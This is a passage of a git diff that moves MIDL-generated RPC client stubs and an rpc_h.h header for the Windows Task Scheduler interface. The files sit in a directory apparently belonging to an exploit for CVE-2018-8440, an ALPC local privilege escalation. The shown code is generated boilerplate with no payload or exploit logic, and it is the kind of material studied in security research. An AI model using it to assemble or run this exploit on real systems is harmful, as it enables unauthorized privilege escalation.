), /* 0 */ + + /* Parameter IDL_handle */ + +/* 846 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 848 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 850 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 852 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 854 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 856 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 858 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 860 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 862 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcRename */ + + + /* Return value */ + +/* 864 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 866 */ NdrFcLong( 0x0 ), /* 0 */ +/* 870 */ NdrFcShort( 0xe ), /* 14 */ +/* 872 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 874 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 876 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 878 */ NdrFcShort( 0x8 ), /* 8 */ +/* 880 */ NdrFcShort( 0x8 ), /* 8 */ +/* 882 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x4, /* 4 */ +/* 884 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 886 */ NdrFcShort( 0x0 ), /* 0 */ +/* 888 */ NdrFcShort( 0x0 ), /* 0 */ +/* 890 */ NdrFcShort( 0x0 ), /* 0 */ +/* 892 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 894 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 896 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 898 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 900 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 902 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 904 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_2 */ + +/* 906 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 908 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 910 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 912 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 914 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 916 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcScheduledRuntimes */ + + + /* Return value */ + +/* 918 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 920 */ NdrFcLong( 0x0 ), /* 0 */ +/* 924 */ NdrFcShort( 0xf ), /* 15 */ +/* 926 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ +/* 928 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 930 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 932 */ NdrFcShort( 0x78 ), /* 120 */ +/* 934 */ NdrFcShort( 0x24 ), /* 36 */ +/* 936 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ + 0x8, /* 8 */ +/* 938 */ 0xa, /* 10 */ + 0x3, /* Ext Flags: new corr desc, clt corr check, */ +/* 940 */ NdrFcShort( 0x1 ), /* 1 */ +/* 942 */ NdrFcShort( 0x0 ), /* 0 */ +/* 944 */ NdrFcShort( 0x0 ), /* 0 */ +/* 946 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 948 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 950 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 952 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 954 */ NdrFcShort( 0xa ), /* Flags: must free, in, */ +/* 956 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 958 */ NdrFcShort( 0xf2 ), /* Type Offset=242 */ + + /* Parameter arg_2 */ + +/* 960 */ NdrFcShort( 0xa ), /* Flags: must free, in, */ +/* 962 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 964 */ NdrFcShort( 0xf2 ), /* Type Offset=242 */ + + /* Parameter arg_3 */ + +/* 966 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 968 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 970 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_4 */ + +/* 972 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 974 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 976 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_5 */ + +/* 978 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 980 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 982 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_6 */ + +/* 984 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ +/* 986 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ +/* 988 */ NdrFcShort( 0x104 ), /* Type Offset=260 */ + + /* Parameter arg_7 */ + +/* 990 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 992 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ +/* 994 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcGetLastRunInfo */ + + + /* Return value */ + +/* 996 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 998 */ NdrFcLong( 0x0 ), /* 0 */ +/* 1002 */ NdrFcShort( 0x10 ), /* 16 */ +/* 1004 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 1006 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 1008 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 1010 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1012 */ NdrFcShort( 0x58 ), /* 88 */ +/* 1014 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x4, /* 4 */ +/* 1016 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 1018 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1020 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1022 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1024 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 1026 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 1028 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 1030 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 1032 */ NdrFcShort( 0x4112 ), /* Flags: must free, out, simple ref, srv alloc size=16 */ +/* 1034 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 1036 */ NdrFcShort( 0xf6 ), /* Type Offset=246 */ + + /* Parameter arg_2 */ + +/* 1038 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 1040 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 1042 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 1044 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 1046 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 1048 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcGetTaskInfo */ + + + /* Return value */ + +/* 1050 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 1052 */ NdrFcLong( 0x0 ), /* 0 */ +/* 1056 */ NdrFcShort( 0x11 ), /* 17 */ +/* 1058 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 1060 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 1062 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 1064 */ NdrFcShort( 0x8 ), /* 8 */ +/* 1066 */ NdrFcShort( 0x40 ), /* 64 */ +/* 1068 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x5, /* 5 */ +/* 1070 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 1072 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1074 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1076 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1078 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 1080 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 1082 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 1084 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 1086 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 1088 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 1090 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 1092 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 1094 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 1096 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_3 */ + +/* 1098 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 1100 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 1102 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_4 */ + +/* 1104 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 1106 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 1108 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcGetNumberOfMissedRuns */ + + + /* Return value */ + +/* 1110 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 1112 */ NdrFcLong( 0x0 ), /* 0 */ +/* 1116 */ NdrFcShort( 0x12 ), /* 18 */ +/* 1118 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 1120 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 1122 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 1124 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1126 */ NdrFcShort( 0x24 ), /* 36 */ +/* 1128 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x3, /* 3 */ +/* 1130 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 1132 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1134 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1136 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1138 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 1140 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 1142 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 1144 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 1146 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ +/* 1148 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 1150 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 1152 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 1154 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 1156 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Procedure _SchRpcEnableTask */ + + + /* Return value */ + +/* 1158 */ 0x0, /* 0 */ + 0x48, /* Old Flags: */ +/* 1160 */ NdrFcLong( 0x0 ), /* 0 */ +/* 1164 */ NdrFcShort( 0x13 ), /* 19 */ +/* 1166 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ +/* 1168 */ 0x32, /* FC_BIND_PRIMITIVE */ + 0x0, /* 0 */ +/* 1170 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ +/* 1172 */ NdrFcShort( 0x8 ), /* 8 */ +/* 1174 */ NdrFcShort( 0x8 ), /* 8 */ +/* 1176 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ + 0x3, /* 3 */ +/* 1178 */ 0xa, /* 10 */ + 0x1, /* Ext Flags: new corr desc, */ +/* 1180 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1182 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1184 */ NdrFcShort( 0x0 ), /* 0 */ +/* 1186 */ NdrFcShort( 0x0 ), /* 0 */ + + /* Parameter IDL_handle */ + +/* 1188 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ +/* 1190 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ +/* 1192 */ NdrFcShort( 0xc ), /* Type Offset=12 */ + + /* Parameter arg_1 */ + +/* 1194 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ +/* 1196 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 1198 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + /* Parameter arg_2 */ + +/* 1200 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ +/* 1202 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 1204 */ 0x8, /* FC_LONG */ + 0x0, /* 0 */ + + 0x0 + } + }; + +static const rpc_MIDL_TYPE_FORMAT_STRING rpc__MIDL_TypeFormatString = + { + 0, + { + NdrFcShort( 0x0 ), /* 0 */ +/* 2 */ + 0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */ +/* 4 */ 0x8, /* FC_LONG */ + 0x5c, /* FC_PAD */ +/* 6 */ + 0x12, 0x8, /* FC_UP [simple_pointer] */ +/* 8 */ + 0x25, /* FC_C_WSTRING */ + 0x5c, /* FC_PAD */ +/* 10 */ + 0x11, 0x8, /* FC_RP [simple_pointer] */ +/* 12 */ + 0x25, /* FC_C_WSTRING */ + 0x5c, /* FC_PAD */ +/* 14 */ + 0x12, 0x0, /* FC_UP */ +/* 16 */ NdrFcShort( 0x18 ), /* Offset= 24 (40) */ +/* 18 */ + 0x1a, /* FC_BOGUS_STRUCT */ + 0x3, /* 3 */ +/* 20 */ NdrFcShort( 0x18 ), /* 24 */ +/* 22 */ NdrFcShort( 0x0 ), /* 0 */ +/* 24 */ NdrFcShort( 0x8 ), /* Offset= 8 (32) */ +/* 26 */ 0x36, /* FC_POINTER */ + 0x36, /* FC_POINTER */ +/* 28 */ 0x8, /* FC_LONG */ + 0x40, /* FC_STRUCTPAD4 */ +/* 30 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 32 */ + 0x12, 0x8, /* FC_UP [simple_pointer] */ +/* 34 */ + 0x25, /* FC_C_WSTRING */ + 0x5c, /* FC_PAD */ +/* 36 */ + 0x12, 0x8, /* FC_UP [simple_pointer] */ +/* 38 */ + 0x25, /* FC_C_WSTRING */ + 0x5c, /* FC_PAD */ +/* 40 */ + 0x21, /* FC_BOGUS_ARRAY */ + 0x3, /* 3 */ +/* 42 */ NdrFcShort( 0x0 ), /* 0 */ +/* 44 */ 0x28, /* Corr desc: parameter, FC_LONG */ + 0x0, /* */ +/* 46 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 48 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ +/* 50 */ NdrFcLong( 0xffffffff ), /* -1 */ +/* 54 */ NdrFcShort( 0x0 ), /* Corr flags: */ +/* 56 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ + 0x0, /* 0 */ +/* 58 */ NdrFcShort( 0xffd8 ), /* Offset= -40 (18) */ +/* 60 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 62 */ + 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ +/* 64 */ NdrFcShort( 0xffc6 ), /* Offset= -58 (6) */ +/* 66 */ + 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ +/* 68 */ NdrFcShort( 0x2 ), /* Offset= 2 (70) */ +/* 70 */ + 0x12, 0x0, /* FC_UP */ +/* 72 */ NdrFcShort( 0x2 ), /* Offset= 2 (74) */ +/* 74 */ + 0x1a, /* FC_BOGUS_STRUCT */ + 0x3, /* 3 */ +/* 76 */ NdrFcShort( 0x18 ), /* 24 */ +/* 78 */ NdrFcShort( 0x0 ), /* 0 */ +/* 80 */ NdrFcShort( 0x8 ), /* Offset= 8 (88) */ +/* 82 */ 0x8, /* FC_LONG */ + 0x8, /* FC_LONG */ +/* 84 */ 0x36, /* FC_POINTER */ + 0x36, /* FC_POINTER */ +/* 86 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 88 */ + 0x12, 0x8, /* FC_UP [simple_pointer] */ +/* 90 */ + 0x25, /* FC_C_WSTRING */ + 0x5c, /* FC_PAD */ +/* 92 */ + 0x12, 0x8, /* FC_UP [simple_pointer] */ +/* 94 */ + 0x25, /* FC_C_WSTRING */ + 0x5c, /* FC_PAD */ +/* 96 */ + 0x11, 0x8, /* FC_RP [simple_pointer] */ +/* 98 */ 0x8, /* FC_LONG */ + 0x5c, /* FC_PAD */ +/* 100 */ + 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ +/* 102 */ NdrFcShort( 0x2 ), /* Offset= 2 (104) */ +/* 104 */ + 0x12, 0x0, /* FC_UP */ +/* 106 */ NdrFcShort( 0x2 ), /* Offset= 2 (108) */ +/* 108 */ + 0x21, /* FC_BOGUS_ARRAY */ + 0x3, /* 3 */ +/* 110 */ NdrFcShort( 0x0 ), /* 0 */ +/* 112 */ 0x28, /* Corr desc: parameter, FC_LONG */ + 0x54, /* FC_DEREFERENCE */ +/* 114 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ +/* 116 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ +/* 118 */ NdrFcLong( 0xffffffff ), /* -1 */ +/* 122 */ NdrFcShort( 0x0 ), /* Corr flags: */ +/* 124 */ + 0x12, 0x8, /* FC_UP [simple_pointer] */ +/* 126 */ + 0x25, /* FC_C_WSTRING */ + 0x5c, /* FC_PAD */ +/* 128 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 130 */ + 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ +/* 132 */ NdrFcShort( 0x2 ), /* Offset= 2 (134) */ +/* 134 */ + 0x12, 0x0, /* FC_UP */ +/* 136 */ NdrFcShort( 0x14 ), /* Offset= 20 (156) */ +/* 138 */ + 0x1d, /* FC_SMFARRAY */ + 0x0, /* 0 */ +/* 140 */ NdrFcShort( 0x8 ), /* 8 */ +/* 142 */ 0x1, /* FC_BYTE */ + 0x5b, /* FC_END */ +/* 144 */ + 0x15, /* FC_STRUCT */ + 0x3, /* 3 */ +/* 146 */ NdrFcShort( 0x10 ), /* 16 */ +/* 148 */ 0x8, /* FC_LONG */ + 0x6, /* FC_SHORT */ +/* 150 */ 0x6, /* FC_SHORT */ + 0x4c, /* FC_EMBEDDED_COMPLEX */ +/* 152 */ 0x0, /* 0 */ + NdrFcShort( 0xfff1 ), /* Offset= -15 (138) */ + 0x5b, /* FC_END */ +/* 156 */ + 0x21, /* FC_BOGUS_ARRAY */ + 0x3, /* 3 */ +/* 158 */ NdrFcShort( 0x0 ), /* 0 */ +/* 160 */ 0x28, /* Corr desc: parameter, FC_LONG */ + 0x54, /* FC_DEREFERENCE */ +/* 162 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ +/* 164 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ +/* 166 */ NdrFcLong( 0xffffffff ), /* -1 */ +/* 170 */ NdrFcShort( 0x0 ), /* Corr flags: */ +/* 172 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ + 0x0, /* 0 */ +/* 174 */ NdrFcShort( 0xffe2 ), /* Offset= -30 (144) */ +/* 176 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 178 */ + 0x11, 0x0, /* FC_RP */ +/* 180 */ NdrFcShort( 0xffdc ), /* Offset= -36 (144) */ +/* 182 */ + 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ +/* 184 */ NdrFcShort( 0x2 ), /* Offset= 2 (186) */ +/* 186 */ + 0x12, 0x0, /* FC_UP */ +/* 188 */ NdrFcShort( 0x2 ), /* Offset= 2 (190) */ +/* 190 */ + 0x21, /* FC_BOGUS_ARRAY */ + 0x3, /* 3 */ +/* 192 */ NdrFcShort( 0x0 ), /* 0 */ +/* 194 */ 0x28, /* Corr desc: parameter, FC_LONG */ + 0x54, /* FC_DEREFERENCE */ +/* 196 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 198 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ +/* 200 */ NdrFcLong( 0xffffffff ), /* -1 */ +/* 204 */ NdrFcShort( 0x0 ), /* Corr flags: */ +/* 206 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ + 0x0, /* 0 */ +/* 208 */ NdrFcShort( 0xffc0 ), /* Offset= -64 (144) */ +/* 210 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 212 */ + 0x12, 0x0, /* FC_UP */ +/* 214 */ NdrFcShort( 0x2 ), /* Offset= 2 (216) */ +/* 216 */ + 0x21, /* FC_BOGUS_ARRAY */ + 0x3, /* 3 */ +/* 218 */ NdrFcShort( 0x0 ), /* 0 */ +/* 220 */ 0x28, /* Corr desc: parameter, FC_LONG */ + 0x0, /* */ +/* 222 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ +/* 224 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ +/* 226 */ NdrFcLong( 0xffffffff ), /* -1 */ +/* 230 */ NdrFcShort( 0x0 ), /* Corr flags: */ +/* 232 */ + 0x12, 0x8, /* FC_UP [simple_pointer] */ +/* 234 */ + 0x25, /* FC_C_WSTRING */ + 0x5c, /* FC_PAD */ +/* 236 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 238 */ + 0x11, 0x4, /* FC_RP [alloced_on_stack] */ +/* 240 */ NdrFcShort( 0xffa0 ), /* Offset= -96 (144) */ +/* 242 */ + 0x12, 0x0, /* FC_UP */ +/* 244 */ NdrFcShort( 0x2 ), /* Offset= 2 (246) */ +/* 246 */ + 0x15, /* FC_STRUCT */ + 0x1, /* 1 */ +/* 248 */ NdrFcShort( 0x10 ), /* 16 */ +/* 250 */ 0x6, /* FC_SHORT */ + 0x6, /* FC_SHORT */ +/* 252 */ 0x6, /* FC_SHORT */ + 0x6, /* FC_SHORT */ +/* 254 */ 0x6, /* FC_SHORT */ + 0x6, /* FC_SHORT */ +/* 256 */ 0x6, /* FC_SHORT */ + 0x6, /* FC_SHORT */ +/* 258 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 260 */ + 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ +/* 262 */ NdrFcShort( 0x2 ), /* Offset= 2 (264) */ +/* 264 */ + 0x12, 0x0, /* FC_UP */ +/* 266 */ NdrFcShort( 0x2 ), /* Offset= 2 (268) */ +/* 268 */ + 0x21, /* FC_BOGUS_ARRAY */ + 0x1, /* 1 */ +/* 270 */ NdrFcShort( 0x0 ), /* 0 */ +/* 272 */ 0x28, /* Corr desc: parameter, FC_LONG */ + 0x54, /* FC_DEREFERENCE */ +/* 274 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ +/* 276 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ +/* 278 */ NdrFcLong( 0xffffffff ), /* -1 */ +/* 282 */ NdrFcShort( 0x0 ), /* Corr flags: */ +/* 284 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ + 0x0, /* 0 */ +/* 286 */ NdrFcShort( 0xffd8 ), /* Offset= -40 (246) */ +/* 288 */ 0x5c, /* FC_PAD */ + 0x5b, /* FC_END */ +/* 290 */ + 0x11, 0x4, /* FC_RP [alloced_on_stack] */ +/* 292 */ NdrFcShort( 0xffd2 ), /* Offset= -46 (246) */ + + 0x0 + } + }; + +static const unsigned short DefaultIfName_FormatStringOffsetTable[] = + { + 0, + 42, + 132, + 192, + 246, + 300, + 354, + 426, + 498, + 558, + 642, + 690, + 738, + 816, + 864, + 918, + 996, + 1050, + 1110, + 1158 + }; + + +static const MIDL_STUB_DESC DefaultIfName_StubDesc = + { + (void *)& DefaultIfName___RpcClientInterface, + MIDL_user_allocate, + MIDL_user_free, + &DefaultIfName__MIDL_AutoBindHandle, + 0, + 0, + 0, + 0, + rpc__MIDL_TypeFormatString.Format, + 1, /* -error bounds_check flag */ + 0x50002, /* Ndr library version */ + 0, + 0x800025b, /* MIDL Version 8.0.603 */ + 0, + 0, + 0, /* notify & notify_flag routine table */ + 0x1, /* MIDL flag */ + 0, /* cs routines */ + 0, /* proxy/server info */ + 0 + }; +#if _MSC_VER >= 1200 +#pragma warning(pop) +#endif + + +#endif /* defined(_M_AMD64)*/ + diff --git a/external/source/exploits/CVE-2018-8440/dll/src/rpc_h.h b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_h.h similarity index 95% rename from external/source/exploits/CVE-2018-8440/dll/src/rpc_h.h rename to external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_h.h index 2cdfc20657..f17cc84c54 100755 --- a/external/source/exploits/CVE-2018-8440/dll/src/rpc_h.h +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_h.h @@ -1,251 +1,251 @@ - - -/* this ALWAYS GENERATED file contains the definitions for the interfaces */ - - - /* File created by MIDL compiler version 8.00.0603 */ -/* at Fri Sep 14 13:09:25 2018 - */ -/* Compiler settings for rpc.idl: - Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 - protocol : dce , ms_ext, c_ext, robust - error checks: allocation ref bounds_check enum stub_data - VC __declspec() decoration level: - __declspec(uuid()), __declspec(selectany), __declspec(novtable) - DECLSPEC_UUID(), MIDL_INTERFACE() -*/ -/* @@MIDL_FILE_HEADING( ) */ - -#pragma warning( disable: 4049 ) /* more than 64k source lines */ - - -/* verify that the version is high enough to compile this file*/ -#ifndef __REQUIRED_RPCNDR_H_VERSION__ -#define __REQUIRED_RPCNDR_H_VERSION__ 475 -#endif - -#include "rpc.h" -#include "rpcndr.h" - -#ifndef __RPCNDR_H_VERSION__ -#error this stub requires an updated version of -#endif // __RPCNDR_H_VERSION__ - - -#ifndef __rpc_h_h__ -#define __rpc_h_h__ - -#if defined(_MSC_VER) && (_MSC_VER >= 1020) -#pragma once -#endif - -/* Forward Declarations */ - -/* header files for imported files */ -#include "oaidl.h" -#include "ocidl.h" - -#ifdef __cplusplus -extern "C"{ -#endif - - -#ifndef __DefaultIfName_INTERFACE_DEFINED__ -#define __DefaultIfName_INTERFACE_DEFINED__ - -/* interface DefaultIfName */ -/* [version][uuid] */ - -typedef struct Struct_18_t - { - /* [string][unique] */ wchar_t *StructMember0; - /* [string][unique] */ wchar_t *StructMember1; - long StructMember2; - } Struct_18_t; - -typedef struct Struct_74_t - { - long StructMember0; - long StructMember1; - /* [string][unique] */ wchar_t *StructMember2; - /* [string][unique] */ wchar_t *StructMember3; - } Struct_74_t; - -typedef struct Struct_144_t - { - long StructMember0; - short StructMember1; - short StructMember2; - byte StructMember3[ 8 ]; - } Struct_144_t; - -typedef struct Struct_246_t - { - short StructMember0; - short StructMember1; - short StructMember2; - short StructMember3; - short StructMember4; - short StructMember5; - short StructMember6; - short StructMember7; - } Struct_246_t; - -long _SchRpcHighestVersion( - /* [in] */ handle_t IDL_handle, - /* [out] */ long *arg_1); - -long _SchRpcRegisterTask( - /* [in] */ handle_t IDL_handle, - /* [string][unique][in] */ wchar_t *arg_1, - /* [string][in] */ wchar_t *arg_2, - /* [in] */ long arg_3, - /* [string][unique][in] */ wchar_t *arg_4, - /* [in] */ long arg_5, - /* [in] */ long arg_6, - /* [size_is][unique][in] */ struct Struct_18_t *arg_7, - /* [string][ref][out] */ wchar_t **arg_8, - /* [ref][out] */ struct Struct_74_t **arg_9); - -long SchRpcRetrieveTask( - /* [in] */ handle_t IDL_handle, - /* [string][in] */ wchar_t *arg_1, - /* [string][in] */ wchar_t *arg_2, - /* [in] */ long *arg_3, - /* [string][ref][out] */ wchar_t **arg_4); - -long _SchRpcCreateFolder( - /* [in] */ handle_t 